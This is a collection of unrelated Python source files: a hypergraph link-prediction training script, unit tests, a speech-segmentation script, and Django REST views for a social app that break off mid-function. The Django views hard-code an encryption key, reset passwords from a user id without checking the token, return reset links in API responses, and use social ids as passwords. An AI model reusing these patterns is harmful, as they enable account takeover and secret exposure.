from BatchGenerator import batch_generator
from Classifiers import hgnn
from Classifiers import node2vec
from Classifiers import hyper_sagnn
from DataGenerator import generator
from utils import utils
import networkx as nx
import numpy as np
import scipy.io
import torch
from tqdm import tqdm
# Fix both NumPy and Torch RNGs so runs are reproducible.
np.random.seed(1057)
torch.manual_seed(1057)
parser = argparse.ArgumentParser()
parser.add_argument(
    '--dataset', type=str, default='email-enron',
    help='Name of the dataset. Possible choices: email-enron, '+
    'contact-primary-school, NDC, DBLP, math-sx, contact-high-school, ' +
    'MAG-Geo')
parser.add_argument(
    '--ratio', type=int, default=5,
    help='Number of negative samples for each positive sample in test set')
parser.add_argument(
    '--model', type=str, default='HGNN',
    help='Model to train: HGNN. HyperSAGNN, Node2Vec')
parser.add_argument(
    '--max-epoch', type=int, default=50, help='Number of training epochs')
args = parser.parse_args()
# Load the hyperedge dataset and split it by timestamp into ground (<= 60%),
# train (60-80%) and test (> 80%) portions.
hyperedges, hyperedges_timestamps, hypergraph_nodes = utils.read_benson_dataset(
    args.dataset)
hyperedges_to_timestamp = utils.associate_min_timestamp_with_hyperedges(
    hyperedges, hyperedges_timestamps)
ground_edges, train_edges, test_edges = generator.get_ground_train_test_split(
    args.dataset, hyperedges_to_timestamp, (0.6, 0.8))
# Frozensets allow O(1) membership checks during negative sampling.
hyperedges = {frozenset(hedge) for hedge in hyperedges}
# Negative sampling: args.ratio negatives per positive, drawn separately for
# the train split (conditioned on ground edges) and the test split
# (conditioned on ground + train edges).
neg_samples_size = args.ratio * len(train_edges)
train_negatives = generator.generate_negative_samples_for_hyperedges(
    ground_edges, hyperedges, neg_samples_size)
neg_samples_size = args.ratio * len(test_edges)
test_negatives = generator.generate_negative_samples_for_hyperedges(
    ground_edges + train_edges, hyperedges, neg_samples_size)
# Label positives 1 and negatives 0 for binary link prediction.
train_data = train_edges + train_negatives
train_labels = [1 for _ in range(len(train_edges))] + [
    0 for _ in range(len(train_negatives))]
test_data = test_edges + test_negatives
test_labels = [1 for _ in range(len(test_edges))] + [
    0 for _ in range(len(test_negatives))]
batch_gen = batch_generator.BatchGenerator(
    train_data, train_labels, batch_size=64)
test_gen = batch_generator.BatchGenerator(
    test_data, test_labels, batch_size=64, test_generator=True)
# Train Data: train_edges, train_negatives
# Test Data: test_edges, test_negatives
# Common: nodes, ground_edges
# Incidence matrices: train uses ground edges only; test also sees train edges.
Htrain = utils.get_hypermatrix(ground_edges, len(hypergraph_nodes))
Htest = utils.get_hypermatrix(ground_edges + train_edges, len(hypergraph_nodes))
max_epoch = args.max_epoch
# Training on top of HGNN model.
if args.model == 'HGNN':
    model = hgnn.HGNNHyperlinkPrediction(
        len(hypergraph_nodes), 64, aggregate_method='sag-pool',
        link_pred_method='addition')
    # Hypergraph Laplacians derived from the incidence matrices.
    Gtrain = model.generate_laplacian_matrix_from_hypermatrix(Htrain).to(
        utils.get_device())
    Gtest = model.generate_laplacian_matrix_from_hypermatrix(Htest).to(
        utils.get_device())
    # One-hot (identity) node features as the initial embeddings.
    initial_embeddings = torch.Tensor(np.diag(np.ones(len(hypergraph_nodes))))
    initial_embeddings = initial_embeddings.to(utils.get_device())
    model = model.to(utils.get_device())
    model.trainer(
        initial_embeddings, batch_gen, test_gen, Gtrain, Gtest, max_epoch)
elif args.model == 'Node2Vec':
    # Training on top of Node2vec model.
    # Clique expansion: H * H^T gives a weighted pairwise adjacency matrix.
    Gtrain = (Htrain * Htrain.T).toarray()
    Gtest = (Htest * Htest.T).toarray()
    train_graph = nx.from_numpy_array(Gtrain)
    test_graph = nx.from_numpy_array(Gtest)
    model = node2vec.Node2VecHyperlinkPrediction(
        train_graph, 64, 40, 10, aggregate_method='sag-pool',
        link_pred_method='cosine')
    model.learn_node_embeddings(10, 40)
    model = model.to(utils.get_device())
    model.trainer(batch_gen, test_gen, max_epoch)
elif args.model == 'HyperSAGNN':
    # Training Hyper-SAGNN.
    # Same clique expansion as for Node2Vec.
    Gtrain = (Htrain * Htrain.T).toarray()
    Gtest = (Htest * Htest.T).toarray()
    train_graph = nx.from_numpy_array(Gtrain)
    test_graph = nx.from_numpy_array(Gtest)
    model = hyper_sagnn.HyperSAGNN(train_graph, 64, 40, 10, num_heads=4)
    model.learn_node_embeddings(10, 40)
    model = model.to(utils.get_device())
    model.trainer(batch_gen, test_gen, max_epoch)
# Persist metrics and the best checkpoint under the dataset's name.
model.save_report('%s' % (args.dataset))
model.save_best_model(args.dataset)
|
import types
import pytest
from compute_max_sum import compute_max_sum
class TestComputeMaxSum(object):
    """Unit tests for compute_max_sum over triangle data files.

    Method names (including the existing 'awnser' typo) are kept so test
    selection by name keeps working.
    """

    def test_compute_max_sum_is_a_function(self):
        # Assert the boolean directly; comparing `== True` is redundant.
        assert isinstance(compute_max_sum, types.FunctionType)

    def test_compute_max_sum_returns_the_correct_awnser_with_triangle_1(self):
        assert compute_max_sum('./data/triangle_1.txt') == 1074

    def test_compute_max_sum_returns_the_correct_awnser_with_triangle_2(self):
        assert compute_max_sum('./data/triangle_2.txt') == 7273
|
#!/usr/bin/env python
"""
Create the word-pair segments file used for imposing weak top-down constraints.
Run from ../ directory.
Author: Herman Kamper
Contact: kamperh@gmail.com
Date: 2014-2015
"""
import argparse
import datetime
import os
import sys
#-----------------------------------------------------------------------------#
# UTILITY FUNCTIONS #
#-----------------------------------------------------------------------------#
def check_argv():
    """Parse the command line; print help and exit(1) when no args given."""
    arg_parser = argparse.ArgumentParser(
        description=__doc__.strip().split("\n")[0], add_help=False)
    arg_parser.add_argument("clusters_fn", type=str, help="original file list")
    arg_parser.add_argument("segments_fn", type=str, help="output segments file")
    arg_parser.add_argument(
        "--feats_scp_fn", type=str, help="(default: %(default)s)",
        default="data/train/feats.scp")
    # No arguments at all: show usage instead of an argparse error.
    if len(sys.argv) == 1:
        arg_parser.print_help()
        sys.exit(1)
    return arg_parser.parse_args()
#-----------------------------------------------------------------------------#
# MAIN FUNCTION #
#-----------------------------------------------------------------------------#
def main():
    """Build the word-pair segments file from a clusters file (Python 2).

    Maps each word token (with conversation-level frame times) onto the
    utterance containing it, converting absolute frame indices into
    utterance-relative ones with a one-frame (15 ms) overlap margin.
    """
    args = check_argv()
    wordpairs_fn = args.clusters_fn
    feats_scp_fn = args.feats_scp_fn
    segments_fn = args.segments_fn
    print datetime.datetime.now()
    # Create utterance segments dict
    utterance_segs = {} # utterance_segs["sw02001-A_000098-001156"] is (98, 1156)
    for line in open(feats_scp_fn):
        line = line.split(" ")[0]
        # Frame range is encoded in the utterance id after the last "_".
        utterance_segs[line] = tuple([int(i) for i in line.split("_")[-1].split("-")])
    # Create word-pair segments dict
    word_segs = {} # word_segs["organized_sw02111-A_000280_000367"] is ("sw02111-A", 280, 367)
    for line in open(wordpairs_fn):
        # Extract info
        word, conversation_1, speaker_id_1, start_1, end_1, conversation_2, speaker_id_2, start_2, end_2 = (
            line.split(" ")
            )
        # Add first word in pair
        # Rewrite e.g. "2111A" into the "sw02111-A" conversation id form.
        conversation_1 = "sw0" + conversation_1[:-1] + "-" + conversation_1[-1]
        start_1 = int(start_1)
        end_1 = int(end_1)
        word_id_1 = word + "_" + conversation_1 + "_" + "%06d" % start_1 + "-" + "%06d" % end_1
        if word_id_1 not in word_segs:
            word_segs[word_id_1] = (conversation_1, start_1, end_1)
        # Add second word in pair
        conversation_2 = "sw0" + conversation_2[:-1] + "-" + conversation_2[-1]
        start_2 = int(start_2)
        end_2 = int(end_2)
        word_id_2 = word + "_" + conversation_2 + "_" + "%06d" % start_2 + "-" + "%06d" % end_2
        if word_id_2 not in word_segs:
            word_segs[word_id_2] = (conversation_2, start_2, end_2)
    # Write segments file
    f = open(segments_fn, "w")
    print "Writing segments to: " + segments_fn
    i_word = 0
    for word_id in word_segs:
        conversation, word_start, word_end = word_segs[word_id]
        # Find the utterance(s) of this conversation containing the word.
        for utt_id in [i for i in utterance_segs.keys() if i.startswith(conversation)]:
            utt_start, utt_end = utterance_segs[utt_id]
            if word_start > utt_start and word_start < utt_end:
                start = word_start - utt_start - 1 # one extra frame at start (i.e. 15 ms overlap of window)
                if start < 0:
                    start = 0
                # end = word_end - utt_start - 3 + 1
                end = word_end - utt_start - 2 + 1 # also corresponds to a frame with 15 ms overlap
                if end > utt_end:
                    end = utt_end
                f.write(word_id + " " + utt_id + " " + str(start) + " " + str(end) + "\n")
                i_word += 1
    # print "Processed " + str(i_word) + " words."
    f.close()
    print datetime.datetime.now()

# Script entry point.
if __name__ == "__main__":
    main()
|
from django.shortcuts import render
from rest_framework.decorators import api_view,renderer_classes
from django.views.decorators.csrf import csrf_exempt
from django.db import transaction
from apis.models import *
from apis.serializers import *
from rest_framework.response import Response
from rest_framework import status
from multiprocessing import Lock
from django.http import JsonResponse
from django.core.serializers.json import DjangoJSONEncoder
import json
from django.core.mail import EmailMessage
from commons.constant import *
import traceback
from django.contrib.auth import authenticate, login
from rest_framework.authtoken.models import Token
from django.contrib.auth.models import Group
import base64
from django.db.models import F
import os
from django.db.models import Q
import uuid
from pyfcm import FCMNotification
from django.db import connection
from django.conf import settings
from django.core.files.storage import default_storage
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.contrib.auth.tokens import default_token_generator
import base64, random, pytz
from django.contrib.auth.hashers import check_password, make_password
import datetime
from django.core.files.storage import FileSystemStorage
from pytz import timezone
from django.utils import timezone
from django.core.paginator import Paginator
from apis.models import VerifyLog as VerifyLogModel
import stripe
from django.http import JsonResponse
from apis.decorators import AppVersion_required
from django.urls import reverse
import math
from django.db.models import Value
from django.db.models.query import QuerySet
from django.db.models import Avg, Max, Min, Sum, Count
import cryptography
from cryptography.fernet import Fernet
# SECURITY(review): hard-coded symmetric Fernet key committed to source --
# anyone with repo access can decrypt; move to settings/secret storage.
key = b'T8JAUX6QZCl8LFoLuoTJVWUqW8odTZN8ha6a4t0nbg0='
cipher_suite = Fernet(key)
#=======================================
#subscriber on NewsLetter
#========================================
@csrf_exempt
@api_view(['POST'])
def SubScribe(request):
    """POST: subscribe an email address to the newsletter.

    Returns 409 if the address is already subscribed, 201 on creation,
    500 on any unexpected error.
    """
    try:
        with transaction.atomic():
            #received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
            try:
                user = Subscribe.objects.get(email = request.data['email'])
                return Response({"message" : errorSubEmailExist, "status" : "0"}, status=status.HTTP_409_CONFLICT)
            except:
                # NOTE(review): bare except also swallows DB errors, not only
                # Subscribe.DoesNotExist.
                subuser = Subscribe.objects.create(email = request.data['email'])
                return Response({"message" : addSubSuccessMessage,"status" : "1"}, status=status.HTTP_201_CREATED)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===============================
#Reach Us Distaff
#================================
@api_view(['POST'])
def ReachUsEmail(request):
    """POST: forward a "contact us" form to the support mailbox.

    The HTML email is sent first; only when the send succeeds is the
    query persisted as a ReachUs row.
    """
    try:
        with transaction.atomic():
            # received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
            name = request.data['name']
            phone = request.data['phone']
            email = request.data['email']
            subject = request.data['subject']
            message = request.data['message']
            email_body = """\
                <html>
                <head>Dear</head>
                <body>
                <h2>%s</h2>
                <p>%s</p>
                <p> This email was sent from: </p>
                <h5>%s</h5>
                <h5>email:%s</h5>
                </body>
                </html>
                """ % (subject, message,name, email)
            # `email` is rebound from the sender address to the message object.
            email = EmailMessage('Contact Us Mail ! ', email_body, to=['sam.costich@distaff.app'])
            email.content_subtype = "html" # this is the crucial part
            response = email.send()
            if response:
                contact = ReachUs.objects.create( name = name,
                                                  phone = phone,
                                                  email = request.data['email'],
                                                  subject = subject,
                                                  message = message,
                                                  )
                if contact is not None:
                    return Response({"status": "1", 'message': 'Query submitted successfully.'}, status=status.HTTP_200_OK)
                else:
                    return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            else:
                return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
    except:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#===========================
#Sign Up
#=============================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def SignUp(request):
    """POST: register a new user and email them a verification link.

    Flow: reject duplicate emails, create the User (hashed password), add
    them to the 'User' group, log a verification token, and best-effort
    send the verification email (send failures are silently ignored).
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
            try:
                user = User.objects.get(email = received_json_data['email'])
                # NOTE(review): duplicate email is reported with HTTP 201.
                return Response({"message" : errorEmailExist, "status" : "0"}, status=status.HTTP_201_CREATED)
            except:
                authuser = User.objects.create(email = received_json_data['email'],
                                               phone = received_json_data['phone'],
                                               username = received_json_data['email'],
                                               password = make_password(received_json_data['password']),
                                               deviceId = received_json_data['deviceId'],
                                               deviceType = received_json_data['deviceType'])
                g = Group.objects.get(name='User')
                g.user_set.add(authuser)
                if authuser:
                    userobj = User.objects.get(id=authuser.id)
                    # uid is base64-encoded so it can travel in the URL.
                    b64UserId = urlsafe_base64_encode(str(userobj.id).encode('utf-8'))
                    myUserToken = default_token_generator.make_token(userobj)
                    # nowTime = timezone.now().replace(tzinfo=None).replace(microsecond=0)
                    nowTime = datetime.datetime.now().replace(tzinfo=None).replace(microsecond=0)
                    VerifyLogModel.objects.create(id=uuid.uuid4(),
                                                  user_id=authuser.id,
                                                  code=myUserToken,
                                                  created_time = nowTime)
                    projectUrl = request.build_absolute_uri('/')[:]
                    verifyLinkUrl = projectUrl + "verifymail?uid=" + b64UserId + "&token=" + myUserToken
                    # NOTE(review): `list` shadows the builtin.
                    list = []
                    list.append(request.data['email'])
                    try:
                        subject = "Verification Mail"
                        email_body = """\
                        <html>
                        <head></head>
                        <body>
                        <h2>Dear Distaff User, </h2>
                        <p> To initiate the verification process,
                        Please click the link below:</p>
                        <p> %s </p>
                        <p>If clicking the link above doesn't work, please copy and paste the URL in a new browser
                        window instead.</p>
                        <p>Sincerely, </p>
                        <p>Distaff Team
                        </p>
                        </body>
                        </html>
                        """ %(verifyLinkUrl)
                        email = EmailMessage('Email Verification Mail! ', email_body, to=list)
                        email.content_subtype = "html"
                        response = email.send()
                    except Exception as e:
                        # Best-effort: signup succeeds even if email fails.
                        pass
                    return Response(
                        {"message": "A verification link has been sent to your email account"},status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
def verifymail(request):
    """GET: confirm an email address from the link sent by SignUp.

    Expects ``uid`` (base64 user id) and ``token`` query params; marks the
    user's verification codes used and flags the email verified.
    """
    receivedUid = request.GET['token']
    b64UserId = request.GET['uid']
    b64UserDId = urlsafe_base64_decode(b64UserId)
    userobj1 = User.objects.get(id=b64UserDId)
    try:
        codeExist = VerifyLogModel.objects.filter(code=receivedUid).filter(user_id=userobj1.id).latest('created_time')
    except:
        codeExist = None
    if codeExist is not None and codeExist.codeUsed == 0:
        # Consume every outstanding code for this user, then mark verified.
        VerifyLogModel.objects.filter(user_id=userobj1.id).update(codeUsed = 1)
        User.objects.filter(id = userobj1.id).update(is_email_verified = 1)
        return render(request,"passwordReset/VerifyEmaildone.html")
    else:
        print(traceback.format_exc())
        return render(request,"passwordReset/VerifyEmailnotdone.html")
#================================================
# UPDATE DEVICE ID
#================================================
@AppVersion_required
@api_view(['POST'])
def UpdateDeviceId(request):
    """POST: update the authenticated user's push-notification device id.

    Auth token is read from the Authorization header; 401 on a bad token.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
            device_Id = received_json_data['deviceId']
            API_key = request.META.get('HTTP_AUTHORIZATION')
            if API_key is not None:
                try:
                    token = Token.objects.get(key=API_key)
                    user = token.user
                    checkGroup = user.groups.filter(name='User').exists()
                except Exception as e1:
                    return Response({"message" : "Session Expired!! Please Login Again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
            # NOTE(review): if no Authorization header was sent, `user` is
            # unbound here and the update raises NameError (caught as 500).
            if device_Id is not None:
                User.objects.filter(id = user.id).update(deviceId = device_Id)
                return Response({"message" : "DeviceId has been changed"}, status=status.HTTP_200_OK)
            else:
                return Response({"message" : "DeviceId is null"}, status=status.HTTP_200_OK)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==================================================
#send verify link
# ==================================================
@AppVersion_required
@api_view(['POST'])
def SendVerifyLink(request):
    """POST: email a password-reset/verification link to an existing user.

    404 if the email is unknown; otherwise logs a one-time token and
    best-effort sends the link (send failures are silently ignored).
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body, strict=False)
            try:
                emailExist = User.objects.get(email = received_json_data['email'])
            except Exception as e:
                return Response ({"message": "This email does not exist", "status": "0"},status=status.HTTP_404_NOT_FOUND)
            if emailExist:
                userobj = User.objects.get(id=emailExist.id)
                # uid is base64-encoded so it can travel in the URL.
                b64UserId = urlsafe_base64_encode(str(userobj.id).encode('utf-8'))
                myUserToken = default_token_generator.make_token(userobj)
                nowTime = datetime.datetime.now().replace(tzinfo=None).replace(microsecond=0)
                ForgetPasswordLog.objects.create(id=uuid.uuid4(),
                                                 user_id=emailExist.id,
                                                 code=myUserToken,
                                                 createdTime= nowTime
                                                 )
                projectUrl = request.build_absolute_uri('/')[:]
                verifyLinkUrl = projectUrl + "validateuser?uid=" + b64UserId + "&token=" + myUserToken
                # NOTE(review): `list` shadows the builtin.
                list = []
                list.append(request.data['email'])
                try:
                    subject = "Verification Mail"
                    email_body = """\
                    <html>
                    <head></head>
                    <body>
                    <h2>Dear %s, </h2>
                    <p> To initiate the verification process,
                    Please click the link below:</p>
                    <p> %s </p>
                    <p>If clicking the link above doesn't work, please copy and paste the URL in a new browser
                    window instead.</p>
                    <p>Sincerely, </p>
                    <p>Distaff Team
                    </p>
                    </body>
                    </html>
                    """ %(emailExist.fullname, verifyLinkUrl)
                    email = EmailMessage('Email Verification Mail! ', email_body, to=list)
                    email.content_subtype = "html"
                    response = email.send()
                except Exception as e:
                    # Best-effort: the link is still returned in the response.
                    pass
                return Response(
                    {"message": "An email has been sent to verify your email", "status": "1", "url": verifyLinkUrl},status=status.HTTP_200_OK)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# ===============================================
# method for verify email
# ===============================================
def validateuser(request):
    """GET: validate a password-reset link before showing the reset form.

    Expects ``uid`` (base64 user id) and ``token`` query params; renders
    the reset page with ``validlink`` True only for an unused, matching code.
    """
    receivedUid = request.GET['token']
    b64UserId = request.GET['uid']
    b64UserDId = urlsafe_base64_decode(b64UserId)
    userobj1 = User.objects.get(id=b64UserDId)
    try:
        codeExist = ForgetPasswordLog.objects.filter(code=receivedUid).filter(user_id=userobj1.id).latest('createdTime')
    except:
        codeExist = None
    if codeExist is not None and codeExist.codeUsed == 0:
        context = {'validlink': True, 'userId': b64UserId}
        return render(request, 'passwordReset/Reset_pwd.html',context)
    else:
        print(traceback.format_exc())
        context = {'validlink': False}
        return render(request, 'passwordReset/Reset_pwd.html',context)
# =====================================
# Forget Password
# =========================================
@csrf_exempt
@api_view(['POST'])
def ForgetPassword(request):
    """POST: set a new password for the user identified by base64 ``uid``.

    Rejects reuse of the current password, stores the new hash exactly
    once, and marks the latest ForgetPasswordLog entry as consumed so the
    reset link cannot be replayed.  500 on any unexpected error.
    """
    try:
        with transaction.atomic():
            b64Id = request.data['uid']
            b64UserDId = urlsafe_base64_decode(b64Id)
            newPassword = request.data['newPassword']
            user = User.objects.get(id=b64UserDId)
            # BUGFIX: the original compared the stored *hash* with the
            # plaintext (user.password == newPassword), so the "old
            # password" check could never trigger.  check_password hashes
            # the candidate before comparing.
            if check_password(newPassword, user.password):
                return Response({"message": "You have used an old password!!", "status": "0"},
                                status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            # BUGFIX: the original hashed and wrote the password twice
            # (set_password()+save() followed by update(make_password(...)));
            # hash and persist once.
            user.set_password(newPassword)
            user.save()
            rec = ForgetPasswordLog.objects.filter(user_id=user.id).latest('createdTime')
            if rec is not None:
                # Consume the reset code so the link cannot be replayed.
                ForgetPasswordLog.objects.filter(id=rec.id).update(codeUsed=1)
                print(rec)
            return Response({"message": "Password reset successfully!!", "status": "1"},
                            status=status.HTTP_201_CREATED)
    except Exception as e:
        print(traceback.format_exc())
        return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==============================================
# Method for term and condition
#===============================================
def Terms_Conditions(request):
    """Render the static terms & conditions page."""
    return render(request, "passwordReset/term&conditions.html")
#==============================================
# Method for Privacy Policy
#===============================================
def privacy_policy(request):
    """Render the static privacy policy page."""
    return render(request, "passwordReset/privacy.html")
#========================================
# Method for Cancel policy
#========================================
def cancel_policy(request):
    """Render the static cancellation policy page."""
    return render(request, "passwordReset/cancel.html")
#========================================
# api for login user
#========================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def Applogin(request):
    """Authenticate an app user by email/password.

    POST body keys: email, password, deviceId, deviceType.
    On success, issues a fresh DRF token (replacing any existing one),
    records the device, and returns the user's profile payload. Incomplete
    profiles (is_pro_created falsy) get errorIncompleteProfile and a payload
    without the canAddPost flag, matching the previous response shape.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body.decode('utf-8'), strict=False)
            deviceId = received_json_data['deviceId']
            deviceType = received_json_data['deviceType']
            user = authenticate(username=received_json_data['email'], password=received_json_data['password'])
            nowTime = datetime.datetime.now()
            # Guard clauses replace the old deeply nested if/else pyramid.
            if not user:
                return Response({"message": errorEmailPasswordIncorrect}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
            if user.is_email_verified == -1:
                return Response({"message": "Please verify your email first"}, status=status.HTTP_201_CREATED)
            if deviceId != "":
                User.objects.filter(id=user.id).update(deviceId=deviceId, deviceType=deviceType,
                                                       login_type='e', lastUpdated=nowTime)
            if not user.is_active:
                return Response({"message": errorBlockedAcount}, status=status.HTTP_401_UNAUTHORIZED)
            # Always replace any existing token with a fresh one (the old
            # code's if/else branches both ended up doing exactly this).
            Token.objects.filter(user=user).delete()
            token = Token.objects.create(user=user).key
            # Re-read to pick up the device/login_type update above; the old
            # code used the stale `user.login_type` in one branch and the
            # refreshed `user1.login_type` in the other - now consistent.
            user1 = User.objects.get(id=user.id)
            # Posting requires both a username and a full name (the old
            # four-way nested conditional reduced to exactly this).
            canAddPost = user.user_name != "" and user.fullname != ""
            userDetail = {
                "id": user.id,
                "token": token,
                "email": user.email,
                "phone": user.phone,
                "fullname": user.fullname,
                "address": user.address,
                "date_of_birth": user.date_of_birth,
                "gender": user.gender,
                "about_me": user.about_me,
                "login_type": user1.login_type,
                "user_name": user.user_name,
                "deviceId": deviceId,
                "deviceType": deviceType,
                "is_profile_created": user.is_pro_created,
                "image": user.image,
                "notificationStatus": user.onoffnotification,
            }
            if user.is_pro_created == False:
                # Incomplete profile: canAddPost deliberately omitted from the payload.
                return Response({"message": errorIncompleteProfile, "response": userDetail},
                                status=status.HTTP_200_OK)
            userDetail["canAddPost"] = canAddPost
            return Response({"message": loginSuccessMessage, "response": userDetail}, status=status.HTTP_200_OK)
    except Exception:
        print(traceback.format_exc())
        return Response({"message": errorMessage}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================================
# social login via instagram,facebook,gmail
#====================================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def SocialLogin(request):
    """Log in (or sign up) a user via a social provider.

    POST body keys: deviceId, deviceType, social_id, login_type
    ('f' facebook, 'g' google, 'ap' apple, 'i' instagram) and, for
    f/g/ap, an email. A known social_id is authenticated and issued a
    fresh token; an unknown one creates a new account in the 'User' group.
    """
    try:
        with transaction.atomic():
            received_json_data = json.loads(request.body, strict=False)
            # NOTE(review): nowTime is computed but never used below.
            nowTime = datetime.datetime.now()
            deviceId = received_json_data['deviceId']
            deviceType=received_json_data['deviceType']
            social_id=received_json_data['social_id']
            # NOTE(review): when social_id == "" no branch returns, so the view
            # implicitly returns None - confirm clients never send an empty id.
            if social_id != "":
                try:
                    user1 = User.objects.get(social_id=social_id)
                except:
                    user1 = None
                if user1 is not None:
                    # Existing social account: the social_id doubles as the password.
                    authuser = authenticate(username=social_id, password=social_id)
                    # NOTE(review): if this authentication fails, no response is
                    # returned (implicit None) - confirm that path is unreachable.
                    if authuser:
                        if deviceId != "":
                            User.objects.filter(id = user1.id).update(deviceId = deviceId,deviceType=deviceType)
                        user2 = User.objects.get(id = user1.id)
                        # Replace any existing auth token with a fresh one.
                        token = ''
                        try:
                            user_with_token = Token.objects.get(user=authuser)
                        except:
                            user_with_token = None
                        if user_with_token is None:
                            token1 = Token.objects.create(user=authuser)
                            token = token1.key
                        else:
                            Token.objects.get(user=authuser).delete()
                            token1 = Token.objects.create(user=authuser)
                            token = token1.key
                        # canAddPost is True only when both user_name and fullname are set.
                        if user2.user_name == "":
                            canAddPost = False
                            if user2.fullname == "":
                                canAddPost = False
                            else:
                                canAddPost = False
                        else:
                            canAddPost = True
                            if user2.fullname == "":
                                canAddPost = False
                            else:
                                canAddPost = True
                        if user2.is_pro_created == False:
                            # Profile not completed yet: same payload but without canAddPost.
                            userDetail = {
                                "id" : user2.id,
                                "token": token,
                                "email" : user2.email,
                                "fullname" : user2.fullname,
                                "gender" : user2.gender,
                                "about_me" : user2.about_me,
                                "social_id" : user2.social_id,
                                "image": user2.image,
                                "user_name" : user2.user_name,
                                "login_type" : user2.login_type,
                                "date_of_birth" : user2.date_of_birth,
                                "phone" : user2.phone,
                                "address" : user2.address,
                                "deviceId" : user2.deviceId,
                                "deviceType" : user2.deviceType,
                                "created_time" : user2.created_time,
                                "is_profile_created" :user2.is_pro_created,
                                "notificationStatus" : user2.onoffnotification,
                            }
                            return Response({"message" : errorIncompleteProfile, "response": userDetail}, status=status.HTTP_200_OK)
                        else:
                            userDetail = {
                                "id" : user2.id,
                                "token": token,
                                "email" : user2.email,
                                "fullname" : user2.fullname,
                                "gender" : user2.gender,
                                "about_me" : user2.about_me,
                                "social_id" : user2.social_id,
                                "image": user2.image,
                                "user_name" : user2.user_name,
                                "login_type" : user2.login_type,
                                "date_of_birth" : user2.date_of_birth,
                                "phone" : user2.phone,
                                "address" : user2.address,
                                "deviceId" : user2.deviceId,
                                "deviceType" : user2.deviceType,
                                "created_time" : user2.created_time,
                                "is_profile_created" :user2.is_pro_created,
                                "notificationStatus" : user2.onoffnotification,
                                "canAddPost": canAddPost
                            }
                            return Response({"message" : loginSuccessMessage,"response":userDetail}, status=status.HTTP_200_OK)
                # Unknown social_id, facebook/google/apple sign-up path.
                elif (received_json_data['login_type'] == "f" or received_json_data['login_type'] == "g" or received_json_data['login_type'] == "ap"):
                    email = received_json_data['email']
                    # Apple sign-in skips the duplicate-email check.
                    if received_json_data['login_type'] == "ap":
                        user=None
                    else:
                        user = User.objects.filter(email = email).exists()
                    if user:
                        return Response({"message" : errorEmailExist}, status=status.HTTP_409_CONFLICT)
                    else:
                        user = User.objects.create(username = received_json_data['social_id'],
                                            social_id = received_json_data['social_id'],
                                            email = received_json_data['email'],
                                            password = make_password(received_json_data['social_id']),
                                            deviceId = received_json_data['deviceId'],
                                            deviceType = received_json_data['deviceType']
                                            )
                        if user is not None:
                            # Record which provider created the account.
                            if received_json_data['login_type'] == "f":
                                User.objects.filter(id = user.id).update(login_type = LOGIN_TYPE_STATUS_F)
                            if received_json_data['login_type'] == "g":
                                User.objects.filter(id = user.id).update(login_type = LOGIN_TYPE_STATUS_G)
                            if received_json_data['login_type'] == "ap":
                                User.objects.filter(id = user.id).update(login_type = LOGIN_TYPE_STATUS_AP)
                            g = Group.objects.get(name='User')
                            g.user_set.add(user)
                            token = ''
                            try:
                                user_with_token = Token.objects.get(user=user)
                            except:
                                user_with_token = None
                            if user_with_token is None:
                                token1 = Token.objects.create(user=user)
                                token = token1.key
                            else:
                                Token.objects.get(user=user).delete()
                                token1 = Token.objects.create(user=user)
                                token = token1.key
                            # Re-read to pick up the login_type update above.
                            user = User.objects.get(id =user.id)
                            userdetail = {
                                "id" : user.id,
                                "token": token,
                                "email" : user.email,
                                "fullname" : user.fullname,
                                "gender" : user.gender,
                                "about_me" : user.about_me,
                                "social_id" : user.social_id,
                                "image": user.image,
                                "user_name" : user.user_name,
                                "login_type" : user.login_type,
                                "date_of_birth" : user.date_of_birth,
                                "phone" : user.phone,
                                "address" : user.address,
                                "deviceId" : user.deviceId,
                                "deviceType" : user.deviceType,
                                "created_time" : user.created_time,
                                "is_profile_created" :user.is_pro_created,
                                "notificationStatus" : user.onoffnotification,
                            }
                            return Response({"message" : loginSuccessMessage,"response":userdetail}, status=status.HTTP_200_OK)
                        else:
                            return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
                else:
                    # Instagram sign-up path (no email supplied).
                    if received_json_data['login_type'] == "i":
                        user = User.objects.create(username = received_json_data['social_id'],
                                            social_id = received_json_data['social_id'],
                                            password = make_password(received_json_data['social_id']),
                                            deviceId = received_json_data['deviceId'],
                                            deviceType = received_json_data['deviceType']
                                            )
                    # NOTE(review): if login_type is neither f/g/ap/i, `user` is
                    # unbound here and the NameError falls into the outer except.
                    if user is not None:
                        if received_json_data['login_type'] == "i":
                            User.objects.filter(id = user.id).update(login_type = LOGIN_TYPE_STATUS_I)
                        g = Group.objects.get(name='User')
                        g.user_set.add(user)
                        token = ''
                        try:
